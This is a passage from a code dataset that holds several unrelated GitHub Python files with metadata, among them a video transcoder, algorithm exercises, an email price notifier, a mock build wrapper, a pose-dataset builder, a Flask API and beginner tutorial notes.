ffmpeg.Error:\n return False\n\n def getScaleData(self, data, quality):\n baseWidth = data['width']\n baseHeight = data['height']\n baseBitrate = data['bitrate']\n width = baseWidth\n height = baseHeight\n bitrate = baseBitrate\n\n crf = 14\n if quality == 'sq':\n if width > 720:\n multiplier = baseWidth / 720\n height = int(height / multiplier)\n width = 720\n bitrate = int(baseBitrate / 1.5)\n crf = 17\n if bitrate > 5000:\n bitrate = 5000\n elif quality == 'lq':\n if width > 480:\n multiplier = baseWidth / 480\n height = int(height / multiplier)\n width = 480\n bitrate = int(baseBitrate / 2.25)\n crf = 23\n if bitrate > 2500:\n bitrate = 2500\n if (width % 2) != 0:\n width = width + 1\n if (height % 2) != 0:\n height = height + 1\n if bitrate > 10000:\n bitrate = 10000\n data = {}\n data['width'] = width\n data['height'] = height \n data['bitrate'] = bitrate \n data['crf'] = crf \n return data\n\n def resetTranscodeCount(self):\n self.transcodingCount = 0\n\n def processTranscode(self, tempFile, scaleData, outName, videoInfo):\n audioPresent = videoInfo['audio_present']\n bufSize = scaleData['bitrate'] * 2\n if audioPresent == True:\n inputFile = ffmpeg.input('tmp/' + tempFile)\n videoStream = inputFile.video #.filter('scale', scaleData['width'], scaleData['height'])\n audioStream = inputFile.audio \n joined = ffmpeg.concat(videoStream, audioStream, v=1, a=1).node\n video = joined[0]\n audio = joined[1]\n try:\n ffmpeg.output(video, audio, outName, crf=scaleData['crf'], threads=self.transcode_threads, pix_fmt='yuv420p', acodec='aac', vcodec='libx264', preset=\"veryfast\").run(capture_stdout=True)\n return True\n except ffmpeg.Error as e:\n print(e.stderr)\n return False\n else: \n inputFile = ffmpeg.input('tmp/' + tempFile)\n videoStream = inputFile.video #.filter('scale', scaleData['width'], scaleData['height'])\n joined = ffmpeg.concat(videoStream, v=1).node\n video = joined[0]\n try:\n ffmpeg.output(video, outName, crf=scaleData['crf'], threads=self.transcode_threads, pix_fmt='yuv420p', acodec='aac', vcodec='libx264', preset=\"veryfast\").run(capture_stdout=True)\n return True\n except ffmpeg.Error as e:\n return False\n\n def transcodeVideo(self, tempFile, videoID, skipUpdate, postType):\n print(videoID)\n while self.transcodingCount >= self.max_transcodes:\n time.sleep(random.randint(15,30))\n self.markVideoInProgress(videoID)\n date = datetime.datetime.now()\n datehash = hashlib.md5(str(date).encode('utf-8')).hexdigest()\n dirwithint = datehash + str(random.randrange(1, 999999))\n directory = hashlib.md5(str(dirwithint).encode('utf-8')).hexdigest()\n os.mkdir(self.baseDir + 'videos/' + directory) \n try:\n videoInfo = self.probeVideo(tempFile)\n except:\n self.markVideoFailed(videoID, tempFile)\n return\n qualityList = ['lq', 'sq', 'hq'] # We'll do them in this order.\n pathList = {}\n for quality in qualityList:\n if quality == 'sq':\n qualityStr = ''\n else:\n qualityStr = '_' + quality\n returnName = 'videos/%s/waterfall_%s%s.mp4'% (directory, datehash, qualityStr)\n outName = self.baseDir + returnName\n try:\n scaleData = self.getScaleData(videoInfo, quality)\n size = scaleData['height']\n except:\n continue\n processed = self.processTranscode(tempFile, scaleData, outName, videoInfo)\n if processed == True:\n pathList[quality] = {}\n with open(outName, 'rb') as fh:\n m = hashlib.md5()\n while True:\n data = fh.read(8192)\n if not data:\n break\n m.update(data)\n pathList[quality]['md5'] = m.hexdigest()\n pathList[quality]['path'] = returnName\n pathList[quality]['size'] = size\n else: \n pass\n if len(pathList) == 0:\n self.markVideoFailed(videoID, tempFile)\n return\n else:\n self.markVideoComplete(tempFile, videoID, pathList, skipUpdate, postType)\n return\n\n def markVideoComplete(self, tempFile, videoID, pathList, skipUpdate, postType):\n link = psycopg2.connect(host=self.sqlHost, user=self.sqlUserName, password=self.sqlPassword, database=self.sqlDatabaseName)\n linkCursor = link.cursor()\n print('Post Type ' + postType)\n if linkCursor.connection:\n pass\n else:\n self.failedList.append(videoID)\n return\n try:\n sql = \"UPDATE video SET servers = %s, paths = %s, transcode_status = %s WHERE id = %s\"\n linkCursor.execute(sql, ('{' + self.config['SERVER']['serverID'] + '}', json.dumps(pathList), 'complete', videoID))\n link.commit()\n if skipUpdate is False:\n print(\"Not skipping post update\")\n print(videoID)\n sql = \"UPDATE posts SET post_status = %s, timestamp = %s WHERE video_id = %s\"\n linkCursor.execute(sql, ('posted', datetime.datetime.utcnow(), videoID))\n link.commit()\n for video in list(self.failedList):\n sql = \"UPDATE video SET servers = %s, paths = %s, transcode_status = %s WHERE id = %s\"\n linkCursor.execute(sql, ('{' + self.config['SERVER']['serverID'] + '}', '{}', 'failed', video))\n link.commit()\n self.failedList.remove(video)\n\n linkCursor.close()\n link.close()\n except:\n return\n finally:\n self.transcodingCount = self.transcodingCount - 1\n os.remove('tmp/' + tempFile)\n\n def markAudioComplete(self, audioID, path, md5):\n link = psycopg2.connect(host=self.sqlHost, user=self.sqlUserName, password=self.sqlPassword, database=self.sqlDatabaseName)\n linkCursor = link.cursor()\n if linkCursor.connection:\n pass\n else:\n return\n try:\n sql = \"UPDATE audio SET servers = %s, paths = %s, md5 = %s WHERE id = %s\"\n linkCursor.execute(sql, ('{' + self.config['SERVER']['serverID'] + '}', '\"' +path +'\"', md5, audioID))\n sql = \"UPDATE posts SET post_status = %s, timestamp = %s WHERE audio_id = %s\"\n linkCursor.execute(sql, ('posted', datetime.datetime.utcnow(), audioID))\n link.commit()\n except:\n return\n finally:\n linkCursor.close()\n link.close()","repo_name":"MasterSteelblade/Waterfall","sub_path":"raven/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":17974,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"99"} +{"seq_id":"8993385539","text":"\"\"\"\n给定一个单链表的头节点head,请判断该链表是否为回文结构\n\"\"\"\n\n\nclass Node(object):\n value: int = 0\n next = None\n\n def __init__(self, value):\n self.value = value\n\n def __eq__(self, other):\n return self.value == other.value\n\n def __str__(self):\n return f'Node value: {self.value}'\n\n\ndef is_palindrome1(head: Node) -> bool:\n \"\"\"\n 使用栈实现,需要额外的空间复杂度N\n \"\"\"\n cur = head\n stack = []\n while cur:\n stack.insert(0, cur)\n cur = cur.next\n\n while head:\n if head != stack.pop(0):\n return False\n head = head.next\n return True\n\n\ndef is_palindrome2(head: Node) -> bool:\n \"\"\"\n 使用栈实现,找到队列的上中点,将下半部分所有链表压入栈中,需要额外的空间复杂度N/2\n \"\"\"\n if head is None or head.next is None:\n return True\n if head.next.next is None:\n return head.value == head.next.value\n\n # 求中点位置\n slow = head.next\n fast = head.next.next\n while fast.next and fast.next.next:\n slow = slow.next\n fast = fast.next.next\n\n stack = []\n # 慢指针现在在中点或者上中点位置\n cur = slow.next\n while cur:\n stack.insert(0, cur)\n cur = cur.next\n # 判断栈中和链表是否相等\n cur = head\n while stack:\n if stack.pop(0) != cur:\n return False\n cur = cur.next\n return True\n\n\ndef is_palindrome3(head: Node) -> bool:\n \"\"\"\n 使用栈实现,找到队列的上中点,反转下半部分链表,不使用额外的空间复杂度\n \"\"\"\n if head is None or head.next is None:\n return True\n # 求中点位置\n slow = head\n fast = head\n while fast.next and fast.next.next:\n slow = slow.next # mid\n fast = fast.next.next # end\n mid = slow\n\n # 反转下半部分链表\n pre = None\n cur = mid.next\n mid.next = None\n while cur:\n next_node = cur.next\n cur.next = pre\n pre = cur\n cur = next_node\n end = pre\n\n # 判断链表是否一致\n flag = True\n start = head\n last = end\n while start and end:\n if start.value != end.value:\n flag = False\n break\n start = start.next\n end = end.next\n\n # 还原原链表\n pre = None\n cur = last\n while cur:\n next_node = cur.next\n cur.next = pre\n pre = cur\n cur = next_node\n mid.next = pre\n return flag\n\n\ndef print_nodes(head: Node):\n while head:\n print(head.value, end=',')\n head = head.next\n print()\n\n\ndef build_nodes(word):\n head = cur = None\n for w in word:\n if head is None:\n head = Node(w)\n cur = head\n else:\n cur.next = Node(w)\n cur = cur.next\n return head\n\n\ndef main():\n head = build_nodes('12321')\n res1 = is_palindrome1(head)\n res2 = is_palindrome2(head)\n res3 = is_palindrome3(head)\n print_nodes(head)\n assert res1 == res2 == res3 is True\n\n head = build_nodes('1')\n res1 = is_palindrome1(head)\n res2 = is_palindrome2(head)\n res3 = is_palindrome3(head)\n print_nodes(head)\n assert res1 == res2 == res3 is True\n\n head = build_nodes('12')\n res1 = is_palindrome1(head)\n res2 = is_palindrome2(head)\n res3 = is_palindrome3(head)\n print_nodes(head)\n assert res1 == res2 == res3 is False\n\n head = build_nodes('1221')\n res1 = is_palindrome1(head)\n res2 = is_palindrome2(head)\n res3 = is_palindrome3(head)\n print_nodes(head)\n assert res1 == res2 == res3 is True, (res1, res2, res3)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"pql-eternally/algorithm","sub_path":"classes/Class_09/Code02_IsPalindromeList.py","file_name":"Code02_IsPalindromeList.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"21710174922","text":"# -*-coding:utf-8-*-\nimport smtplib\nimport logging\n\nfrom common import constants, config\nfrom email.mime.text import MIMEText\nfrom email.header import Header\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger(__name__)\n\n\nclass MailSender:\n def __init__(self, data: list, price: float, to_addr: str):\n self.data = data\n self.price = price\n self.to_addr = to_addr\n\n def __send(self, last_price):\n params = config.read_config()\n server = params[config.TAG_SMTP_SERVER]\n server = smtplib.SMTP(server)\n server.ehlo()\n server.starttls()\n from_addr = params[config.TAG_FROM_ADDR]\n password = params[config.TAG_PASSWORD]\n server.login(from_addr, password)\n\n msg_str = 'Hi there\\nThe price of ' + self.data[constants.TAG_INST_ID] + ' is '\n if last_price > self.price * 1.1:\n msg_str += 'above 10% of '\n code = constants.ABOVE_TEN_PERCENT\n elif self.price * 1.05 < last_price <= self.price * 1.1:\n msg_str += 'above 5% of '\n code = constants.ABOVE_FIVE_PERCENT\n elif self.price < last_price <= self.price * 1.05:\n msg_str += 'above '\n code = constants.ABOVE\n elif self.price * 0.95 <= last_price < self.price:\n msg_str += 'below '\n code = constants.BELOW\n elif self.price * 0.9 <= last_price < self.price * 0.95:\n msg_str += 'below 5% of '\n code = constants.BELOW_FIVE_PERCENT\n elif last_price < self.price * 0.9:\n msg_str += 'below 10% of '\n code = constants.BELOW_TEN_PERCENT\n else:\n msg_str += 'equal '\n code = constants.EQUAL\n msg_str += str(self.price)\n msg_str += '\\n'\n\n msg_str += 'The price now is ' + str(last_price)\n msg = MIMEText(msg_str, 'plain', 'utf-8')\n msg['Subject'] = Header('Coin tracker notify...', 'utf-8').encode()\n server.sendmail(from_addr, [self.to_addr], msg.as_string())\n logger.info('%s start sending email...' % from_addr)\n return code\n\n def do(self, check):\n last_price = float(self.data[constants.TAG_LAST_PRICE])\n if check == constants.ABOVE_TEN_PERCENT and last_price > self.price * 1.1:\n return constants.ABOVE_TEN_PERCENT\n if check == constants.ABOVE_FIVE_PERCENT and (self.price * 1.05 < last_price <= self.price * 1.1):\n return constants.ABOVE_FIVE_PERCENT\n if check == constants.ABOVE and (self.price < last_price <= self.price * 1.05):\n return constants.ABOVE\n if check == constants.EQUAL and self.price == last_price:\n return constants.EQUAL\n if check == constants.BELOW and (self.price * 0.95 <= last_price < self.price):\n return constants.BELOW\n if check == constants.BELOW_FIVE_PERCENT and (self.price * 0.9 <= last_price < self.price * 0.95):\n return constants.BELOW_FIVE_PERCENT\n if check == constants.BELOW_TEN_PERCENT and last_price < self.price * 0.9:\n return constants.BELOW_TEN_PERCENT\n\n return self.__send(last_price)\n","repo_name":"allen1989127/coin-checker","sub_path":"action/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"20011813839","text":"import json\nfrom difflib import get_close_matches\ndata = json.load(open(\"C:\\\\Users\\\\ssubh\\\\OneDrive\\\\Desktop\\\\python\\\\Basic\\\\data.json\"))\n\ndef define_wrd(w):\n if w in data:\n return data[w]\n elif len(get_close_matches(w, data.keys())) > 0:\n yn = input(\"Did you mean %s instead?(Enter y/n): \" % get_close_matches(w, data.keys())[0])\n if yn == \"y\":\n return get_close_matches(w, data.keys())[0]\n elif yn == \"n\":\n return \"the word you entered does not exist, double check it\"\n \n else:\n return \"We did not understand what you entered.\"\n \n \n else:\n return \"Im sorry that word does not seem to be in the dictionary.\"\n\nword = input(\"What word do you need defined?: \")\n\noutput = define_wrd(word)\n\nif type(output) == list:\n for item in output:\n print(item)\n","repo_name":"Sandkelp/pythonStart","sub_path":"Basic/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"34779663667","text":"import os\nimport json\nimport shutil\nimport subprocess\nfrom integration.build import shell\nfrom integration.build.api import env\nfrom integration.common import log\n\n# mock_cfg = '/etc/mock/starlingx.cfg'\n\n# all of the variables below are substituted by the build system\n__VERSION__ = \"1.4.21\"\nPYTHONDIR = \"/usr/lib/python3.6/site-packages\"\nPKGPYTHONDIR = \"/usr/lib/python3.6/site-packages/mockbuild\"\nMOCKCONFDIR = '/etc/mock'\n\nMAX_MEM_PER_WORKER = 11\nMIN_MEM_PER_WORKER = 3\n\n# end build system subs\nconfig_opts = None\n\n\ndef init_config_opts():\n global config_opts\n if not config_opts:\n import mockbuild.util\n root_cfg = os.path.join(MOCKCONFDIR, '%s.cfg' % os.environ.get('SYSTEM'))\n config_opts = mockbuild.util.load_config(MOCKCONFDIR, root_cfg, None, __VERSION__, PKGPYTHONDIR)\n\n\nclass Mock(object):\n\n def __init__(self, index, workdir=None, local_repo=None, **kwargs):\n init_config_opts()\n self.config_opts = config_opts\n self.index = index\n self.workdir = workdir\n if local_repo:\n self.add_local_repo(local_repo)\n if self.workdir:\n self.set_mock_env(self.workdir)\n self.config_dir = os.path.join(self.workdir, 'configs')\n if not os.path.exists(self.config_dir):\n os.makedirs(self.config_dir, mode=0o755)\n self.config_file = os.path.join(self.config_dir, '%s.b%d.cfg' % (os.environ.get('USER'), self.index))\n self.create_mock_conf_file()\n # log.info(json.dumps(self.__dict__, indent=4))\n\n def add_local_repo(self, local_repo_dir):\n localyumrepo = \"\"\"\n[%s]\nname=%s\nbaseurl=%s\nenabled=1\nskip_if_unavailable=1\nmetadata_expire=0\ncost=1\nbest=1\n\"\"\" % ('local_build_repo', 'local_build_repo', \"file://%s\" % local_repo_dir)\n self.config_opts['yum.conf'] += localyumrepo\n\n def set_mock_env(self, basedir):\n self.config_opts['basedir'] = basedir\n self.config_opts['resultdir'] = '{0}/result'.format(basedir)\n self.config_opts['backup_base_dir'] = '{0}/backup'.format(basedir)\n self.config_opts['root'] = 'mock/b{0}'.format(self.index)\n self.config_opts['cache_topdir'] = '{0}/cache/b{1}'.format(basedir, self.index)\n self.config_opts['macros']['%_tis_dist'] = '.%s' % env.postfix\n self.config_opts['macros']['%_tis_build_type'] = env.type\n if self.index > 0:\n self.config_opts['plugin_conf']['tmpfs_enable'] = True\n self.config_opts['plugin_conf']['tmpfs_opts'] = {}\n self.config_opts['plugin_conf']['tmpfs_opts']['required_ram_mb'] = 1024\n self.config_opts['plugin_conf']['tmpfs_opts']['max_fs_size'] = \"%dg\" % MAX_MEM_PER_WORKER\n self.config_opts['plugin_conf']['tmpfs_opts']['mode'] = '0755'\n self.config_opts['plugin_conf']['tmpfs_opts']['keep_mounted'] = True\n if not os.path.isdir(self.config_opts['cache_topdir']):\n os.makedirs(self.config_opts['cache_topdir'], exist_ok=True)\n cache_dir = \"%s/%s/mock\" % (self.config_opts['basedir'], self.config_opts['root'])\n if not os.path.isdir(cache_dir):\n os.makedirs(cache_dir)\n\n def create_mock_conf_file(self):\n with open(self.config_file, 'w') as br_dest:\n for k, v in list(self.config_opts.items()):\n br_dest.write(\"config_opts[%r] = %r\\n\" % (k, v))\n with open(self.config_file) as f:\n code = compile(f.read(), self.config_file, 'exec')\n # pylint: disable=exec-used\n exec(code)\n\n # these files needed from the mock.config dir to make mock run\n for fn in ['site-defaults.cfg', 'logging.ini']:\n pth = os.path.join(self.config_dir, fn)\n src = os.path.join(MOCKCONFDIR, fn)\n if os.path.exists(src) and not os.path.exists(pth):\n shutil.copyfile(src, pth)\n\n def execute(self, srpm_file, result_dir=None, defines=None):\n cmd = ['/usr/bin/mock',\n '--configdir', self.config_dir,\n '-r', self.config_file,\n '--no-clean',\n '--no-cleanup-after',\n '--rebuild']\n if result_dir:\n cmd.extend(['--resultdir', result_dir])\n if defines:\n for k, v in defines.items():\n cmd.extend(['--define', \"%s %s\" % (k, v)])\n cmd.append(srpm_file)\n return shell.popen_communicate(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n\n\n\n\n","repo_name":"zhangkunpeng/integration","sub_path":"build/centos/mock.py","file_name":"mock.py","file_ext":"py","file_size_in_byte":4450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"24669037737","text":"import argparse\nimport os\nimport os.path as osp\n\nimport boxlib\nimport numpy as np\nimport posepile.datasets3d as ds3d\nimport simplepyutils as spu\nfrom posepile.util.adaptive_pose_sampling import AdaptivePoseSampler2\nfrom posepile.ds.experimental.cwi.main import temporal_median\nfrom posepile.ds.experimental.vcliti.save_camconfig import load_camera\nfrom posepile.paths import DATA_ROOT\nfrom posepile.util.preproc_for_efficiency import make_efficient_example\nfrom posepile.util import geom3d\nfrom simplepyutils import FLAGS\n\nVCLITI_ROOT = f'{DATA_ROOT}/vcliti'\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--stage', type=int)\n spu.initialize(parser)\n\n if FLAGS.stage == 1:\n make_stage1()\n elif FLAGS.stage == 2:\n make_dataset()\n\n\ndef make_stage1():\n i_task = int(os.environ['SLURM_ARRAY_TASK_ID'])\n out_path = f'{DATA_ROOT}/vcliti_downscaled/tasks/task_result_{i_task:03d}.pkl'\n # if osp.exists(out_path):\n # return\n\n joint_info_base = spu.load_pickle(\n f'{DATA_ROOT}/skeleton_conversion/joint_info_122.pkl')\n i_selected_joints = [\n i for i, name in enumerate(joint_info_base.names)\n if any(name.endswith(x) for x in ['_cmu_panoptic', '_coco']) or '_' not in name]\n joint_info = joint_info_base.select_joints(i_selected_joints)\n joint_info.update_names([x.replace('cmu_panoptic', 'coco') for x in joint_info.names])\n ref_bone_len = np.array(\n spu.load_pickle(f'{DATA_ROOT}/ntu/predictor_bone_length_prior.pkl'), np.float32)\n\n triang_paths_all = spu.sorted_recursive_glob(f'{VCLITI_ROOT}/triang/**/*.pkl')\n triang_paths = triang_paths_all[i_task:(i_task + 1)]\n\n preds_all = spu.load_pickle(f'{VCLITI_ROOT}/metrabs_pred.pkl')\n\n examples = []\n\n with spu.ThrottledPool() as pool:\n for triang_path in triang_paths:\n triang_relpath = osp.relpath(triang_path, f'{VCLITI_ROOT}/triang')\n data = spu.load_pickle(triang_path)\n triangs = temporal_median(data['triangs'])\n indices_per_cam = data['indices_per_cam']\n\n seq_relpath = osp.dirname(triang_relpath)\n seq_path = f'{VCLITI_ROOT}/{seq_relpath}'\n print(seq_path)\n cam_ids = [d[-1] for d in spu.sorted_recursive_glob(f'{seq_path}/D?')]\n cameras = [load_camera(seq_relpath, cam_id)[0] for cam_id in cam_ids]\n print(cam_ids)\n frame_paths_per_cam = [\n spu.sorted_recursive_glob(f'{seq_path}/D{cam_id}/*.jpg')\n for cam_id in cam_ids]\n boxes_per_cam = [\n [[b for b in preds_all[osp.relpath(path, VCLITI_ROOT)]['boxes'] if b[-1] > 0.5]\n for path in frame_paths]\n for frame_paths in frame_paths_per_cam]\n\n print([len(x) for x in boxes_per_cam])\n print([max(x) for x in indices_per_cam])\n print([len(x) for x in frame_paths_per_cam])\n boxes_corresp_per_cam = [\n [boxes[i] for i in indices]\n for boxes, indices in zip(boxes_per_cam, indices_per_cam)]\n frame_paths_corresp_per_cam = [\n [frame_paths[i] for i in indices]\n for frame_paths, indices in zip(frame_paths_per_cam, indices_per_cam)]\n\n for frame_paths, boxes_per_frame, camera in zip(\n frame_paths_corresp_per_cam, boxes_corresp_per_cam, cameras):\n pose_sampler = AdaptivePoseSampler2(100, True, True, 100)\n for i_frame, (frame_path, triang, boxes) in enumerate(\n zip(frame_paths, spu.progressbar(triangs), boxes_per_frame)):\n\n if not np.all(geom3d.are_bones_plausible(\n triang, ref_bone_len, joint_info_base,\n relsmall_thresh=0.3, relbig_thresh=1.5, absbig_thresh=150)):\n continue\n\n box = get_box(triang, boxes, camera)\n n_joints_valid = np.count_nonzero(camera.is_visible(triang, [1920, 1080]))\n if (n_joints_valid < 122 // 4 or\n box is None or\n pose_sampler.should_skip(triang)):\n continue\n\n relpath_to_ds = osp.relpath(frame_path, VCLITI_ROOT)\n new_image_replath = f'vcliti_downscaled/{relpath_to_ds}'\n ex = ds3d.Pose3DExample(\n osp.relpath(frame_path, DATA_ROOT),\n triang[i_selected_joints], bbox=box, camera=camera)\n pool.apply_async(\n make_efficient_example, (ex, new_image_replath),\n kwargs=dict(horizontal_flip=True),\n callback=examples.append)\n\n examples.sort(key=lambda ex: ex.image_path)\n ds_partial = ds3d.Pose3DDataset(joint_info, examples)\n spu.dump_pickle(ds_partial, out_path)\n\n\n@spu.picklecache('vcliti.pkl', min_time=\"2022-01-23T00:32:36\")\ndef make_dataset():\n partial_paths = spu.sorted_recursive_glob(\n f'{DATA_ROOT}/vcliti_downscaled/tasks/task_result_*.pkl')\n partial_dss = [spu.load_pickle(p) for p in partial_paths]\n main_ds = partial_dss[0]\n for ds in partial_dss[1:]:\n main_ds.examples[0].extend(ds.examples[0])\n ds3d.filter_dataset_by_plausibility(\n main_ds, relsmall_thresh=0.5, relbig_thresh=1.25, absbig_thresh=80)\n ds3d.add_masks(\n main_ds, f'{DATA_ROOT}/vcliti_downscaled/masks',\n relative_root=f'{DATA_ROOT}/vcliti_downscaled')\n return main_ds\n\n\ndef get_box(pose, boxes, camera):\n imcoords = camera.world_to_image(pose)\n gt_box = boxlib.expand(boxlib.bb_of_points(imcoords), 1.02)\n if len(boxes) == 0:\n return None\n\n i_det = np.argmax([boxlib.iou(gt_box, det[:4]) for det in boxes])\n box = boxes[i_det][:4]\n if boxlib.iou(gt_box, box) < 0.1:\n return gt_box\n return boxlib.box_hull(box, gt_box)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"isarandi/PosePile","sub_path":"posepile/ds/experimental/vcliti/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6019,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"99"} +{"seq_id":"15799844112","text":"# 2628. 종이자르기\n\n\ndef find_max_area(col, row, cut_list):\n # 잘라지는 가로, 세로 선을 담는 리스트\n row_list = [0, row]\n col_list = [0, col]\n\n # 잘라지는 가로, 세로 선을 리스트에 담음\n for cut in cut_list:\n if cut[0] == 0:\n row_list.append(cut[1])\n else:\n col_list.append(cut[1])\n\n # 잘릴 가로, 세로 선을 오름차순으로 정렬\n row_list.sort()\n col_list.sort()\n\n area = 0\n max_area = 0\n\n # 이중 for문을 돌며 각 잘린 종이의 크기를 재고 최댓값을 구함\n for i in range(len(row_list)-1):\n for j in range(len(col_list)-1):\n area = (row_list[i+1] - row_list[i]) * (col_list[j+1] - col_list[j])\n if area > max_area:\n max_area = area\n\n return max_area\n\n\n# 종이의 가로, 세로 길이\nn, m = map(int, input().split())\n\n# 자를 번호들을 리스트로 만든 후 리스트에 담음\ncut_no = int(input())\nmy_cut_list = []\nfor i in range(cut_no):\n my_cut_list.append(list(map(int, input().split())))\n\nprint(find_max_area(n, m, my_cut_list))\n","repo_name":"alexuhn/algorithm-practice","sub_path":"BOJ/2628.py","file_name":"2628.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"828272514","text":"import json\nimport random\n\nimport numpy as np\nimport requests\nfrom flask import Flask, request, Response\n\nfrom agents import Collector\nfrom ai_model import label_image\nfrom Scraper.WebScraper import WebScraper\n\napp = Flask(__name__)\n\n@app.route('/call-tensor-flow', methods=[\"POST\"])\ndef getConfidence():\n filename = request.json[\"filename\"]\n tfData = label_image.image_predict(filename)\n newTf = []\n for x in tfData:\n prettyData = {}\n prettyData[\"name\"] = x[\"name\"].title()\n prettyData[\"confidence\"] = x[\"confidence\"]\n newTf.append(prettyData)\n out = json.dumps(newTf)\n return Response(out, mimetype='application/json')\n\n@app.route('/recommend', methods=[\"POST\"])\ndef getRecommendations():\n carName = request.json[\"carname\"]\n collector = Collector.Collector(carName)\n out =json.dumps(collector.collect(carName))\n return Response(out, mimetype='application/json')\n","repo_name":"parkerkary/FiixHackathonTeamFive","sub_path":"python/Controller/RestController.py","file_name":"RestController.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"12485562364","text":"# Créé par t.hausmann, le 15/09/2022 en Python 3.7\r\n\r\nL=12\r\n'''\r\nAuteur : Tom Hausmann\r\nDate: 15/09/2022\r\nBut : Calculer la surface et le périmètre d'un quadrilatère\r\nInputs : longueur et largeur\r\nSorties ; perimetre et surface\r\n'''\r\n\r\nl=7\r\nperimetre=(L+1)*2\r\nsurface = L*l\r\nprint(\"perimetre =\" + str(perimetre))\r\nprint(\"surface =\" + str(surface))","repo_name":"Sphax5117/PythonProjects","sub_path":"Lycée/périmetre.py","file_name":"périmetre.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39433296389","text":"from users.models import Address,Cart, CartItem \nfrom owner.models import Delivery\nfrom django.http import HttpResponse\n\n\ndef get_cart_object(instance):\n user_obj = instance.user\n cart_obj= Cart.objects.get(user=user_obj)\n return cart_obj\n \ndef calculate_delivery_charge(instance):\n distance = instance.address.distance\n delivery_obj= Delivery.objects.get(id=1)\n if distance>delivery_obj.max_radius:\n return None\n if distance<=delivery_obj.a1:\n return delivery_obj.c1\n if distance<=delivery_obj.a2:\n return delivery_obj.c2\n if distance<=delivery_obj.a3:\n return delivery_obj.c3\n return distance\n\ndef calculate_tax(instance):\n user_obj = instance.user\n cart_obj= Cart.objects.get(user=user_obj)\n delivery_obj= Delivery.objects.get(id=1)\n tax_percentage=delivery_obj.tax\n tot_cart_amt=cart_obj.total_price\n tax=(tax_percentage/100)*tot_cart_amt\n return tax\n\n","repo_name":"adithyaanilkumar/deliveryt","sub_path":"server/orders/checkout.py","file_name":"checkout.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"5859000161","text":"# lambda - alternative shorter writing of a function\n# def add_nums(a,b):\n# return a + b\n# result = add_nums(5,10)\n# print(result)\n# result = lambda a, b: a + b\n# print(result(10,20))\n\n###################################################################\n\n# map() - ФУНКЦИЯ ВЫСШЕГО ПОРЯДКА ДЛЯ ПРИМЕНЕНИЯ ФУНКЦИИ КАЖДОМУ ЭЛЕМЕНТУ В ИТЕРИРУЕМОМ ТИПЕ\n# lst = [1, 2, 3, 4, 5]\n# result = list(map(lambda x: str(x), lst))\n# def do_str(x):\n# return str(x)\n# result = list(map(do_str, lst))\n# print(result)\n\n###################################################################\n\n# filter()\n# lst = [1,2,3,4,5,6,7,8,9,10]\n# result = list(filter(lambda x: x > 5, lst))\n# def filter_this(x):\n# return x > 5\n# result = list(filter(filter_this, lst))\n# print(result)\n# !!! функция должна принимать и возвращать только один элемент\n\n###################################################################\n\n# reduce() - возвращает только одно значение\n# from functools import reduce\n# lst = [1,2,3,4,5]\n# result = reduce(lambda x, y: x + y, lst)\n# def summ_this(x,y):\n# return x + y\n# result = reduce(summ_this, lst)\n# print(result)\n\n####################################################################\n\n# zip() - возвращает список из кортежей\nemployee_numbers = [2,9,18,28]\nemployee_names = ['Helen', 'Sam', 'Jessica', 'James']\nemployee_spheres = ['IT', 'Broker', 'Cook', 'Banker']\nzipped_values = zip(employee_numbers, employee_names, employee_spheres)\nzipped_list = list(zipped_values)\nprint(zipped_list) \n\n####################################################################\n\n# lst = [1,2,3,4,5,6,7,8,9,10]\n# result = list(map(lambda x: 'even' if x % 2 == 0 else 'odd', lst))\n# def nums(x):\n# return 'even' if x % 2 == 0 else 'odd'\n# result = list(map(nums, lst))\n# print(result)\n\n####################################################################\n\n# CRUD - create, read, update, delete\n#{'Tom': 'pass123'}\n# dct = {}\n# def manager():\n# choice = input('Enter what action do you want to do (c,r,u,d): ')\n# if choice == 'c':\n# create()\n# elif choice == 'r':\n# read()\n# elif choice == 'u':\n# update()\n# elif choice == 'd':\n# delete()\n# else:\n# print('Enter c, r, u or d!')\n\n# def create():\n# global dct\n# name = input('Enter your name: ')\n# password = input('Enter your password: ')\n# dct[name] = password\n# print(f'Successfully created: {dct}.')\n# manager()\n\n# def read():\n# print(f'Users list: {dct.keys()}.')\n# manager()\n\n# def update():\n# global dct\n# name = input('Enter your name: ')\n# if name in dct.keys():\n# new_password = input('Enter your new password: ')\n# dct[name] = new_password\n# print(f'Successfully changed {name}.')\n# else:\n# print('User not found. Register!')\n# create()\n# manager()\n\n# def delete():\n# global dct\n# name = input('Enter your name: ')\n# old_password = input('Enter your old password: ')\n# if old_password == dct[name]:\n# dct.remove(name)\n# else:\n# print('Incorrect password.')\n# manager()\n\n# manager()\n\n# rafael = [1, 0, 3]\n# novak = [2, 2, 1]\n# scores = zip(rafael,novak)\n# def winneris(lst, name1, name2):\n# s1 = 0\n# s2 